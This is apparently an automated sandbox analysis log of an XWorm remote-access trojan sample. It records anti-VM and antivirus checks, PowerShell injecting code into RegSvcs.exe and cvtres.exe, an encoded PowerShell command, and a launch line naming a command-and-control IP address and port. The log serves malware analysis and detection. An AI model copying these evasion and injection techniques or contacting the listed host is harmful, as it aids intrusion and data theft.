Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\timeout.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\timeout.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: Yara match File source: Process Memory Space: RegSvcs.exe PID: 5828, type: MEMORYSTR
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Memory allocated: 11B0000 memory reserve | memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Memory allocated: 2C50000 memory reserve | memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Memory allocated: 2B80000 memory reserve | memory write watch
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 (2 identical events)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5360
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2089
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Window / User API: threadDelayed 4186
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Window / User API: threadDelayed 5661
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1102
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 484
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4960 Thread sleep time: -2767011611056431s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4480 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe TID: 5716 Thread sleep time: -570000s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe TID: 5716 Thread sleep time: -30000s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe TID: 3412 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2104 Thread sleep count: 1102 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3732 Thread sleep count: 484 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5496 Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 3052 Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\svchost.exe File opened: PhysicalDrive0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File Volume queried: C:\ FullSizeInformation (3 identical events)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Thread delayed: delay time: 30000 (2 identical events)
Source: explorer.exe, 0000000B.00000003.2061424879.0000000006E51000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: War&Prod_VMware_
Source: svchost.exe, 00000009.00000002.2948964714.0000028AFD82B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000002.2951401320.0000028AFEE54000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: RegSvcs.exe, 00000002.00000002.2247653196.0000000000E5B000.00000004.00000020.00020000.00000000.sdmp, cvtres.exe, 00000006.00000002.2160042918.0000000000FD8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe base: 400000 protect: page execute and read and write
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe base: 400000 value starts with: 4D5A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 402000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 412000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 414000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: A50008
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe base: 400000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe base: 402000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe base: 40C000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe base: 40E000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe base: B79008
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" 176.113.115.228 4412 P0WER 4C7A640DCC0EFBFFD7AE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmp4E45.tmp.bat""
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\explorer.exe "C:\Windows\system32\explorer.exe" shell::: -encodedCommand MwAwADgAMABGADkAMABFAC0ARAA3AEEARAAtADEAMQBEADkALQBCAEQAOQA4AC0AMAAwADAAMAA5ADQANwBCADAAMgA1ADcA -inputFormat xml -outputFormat text Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout 3
Source: RegSvcs.exe, 00000002.00000002.2250081540.0000000002C22000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.2250081540.0000000002D4F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program Manager
Source: RegSvcs.exe, 00000002.00000002.2250081540.0000000002C22000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.2250081540.0000000002D4F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program Managert-^q
Source: RegSvcs.exe, 00000002.00000002.2250081540.0000000002C22000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.2250081540.0000000002D4F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: @\^q@\^q'PING!<Xwormmm>Program Manager<Xwormmm>0
Source: RegSvcs.exe, 00000002.00000002.2250081540.0000000002C22000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.2250081540.0000000002D4F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: PING!<Xwormmm>Program Manager<Xwormmm>0
Source: RegSvcs.exe, 00000002.00000002.2250081540.0000000002C22000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: $^q'PING!<Xwormmm>Program Manager<Xwormmm>0Te^q
Source: RegSvcs.exe, 00000002.00000002.2250081540.0000000002D4F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: $^q'PING!<Xwormmm>Program Manager<Xwormmm>0Te^q`
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\conhost.exe Queries volume information: C:\Windows\Fonts\segoeuib.ttf VolumeInformation
Source: C:\Windows\System32\conhost.exe Queries volume information: C:\Windows\Fonts\segoeuisl.ttf VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\cmd.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\cmd.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

Stealing of Sensitive Information

Source: Yara match File source: 0.2.powershell.exe.1ee5f4509a0.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.powershell.exe.1ee60275c50.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.RegSvcs.exe.2c02294.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.powershell.exe.1ee5f4509a0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.powershell.exe.1ee60275c50.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000002.00000002.2250081540.0000000002BD1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.2246251774.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1715523883.000001EE5FF27000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1715523883.000001EE5F4AB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1715523883.000001EE5F278000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: powershell.exe PID: 6860, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RegSvcs.exe PID: 5828, type: MEMORYSTR
Source: C:\Windows\explorer.exe Directory queried: C:\Users\user\Documents

Remote Access Functionality

Source: Yara match File source: 0.2.powershell.exe.1ee5f4509a0.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.powershell.exe.1ee60275c50.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.RegSvcs.exe.2c02294.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.powershell.exe.1ee5f4509a0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.powershell.exe.1ee60275c50.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000002.00000002.2250081540.0000000002BD1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.2246251774.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1715523883.000001EE5FF27000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1715523883.000001EE5F4AB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1715523883.000001EE5F278000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: powershell.exe PID: 6860, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RegSvcs.exe PID: 5828, type: MEMORYSTR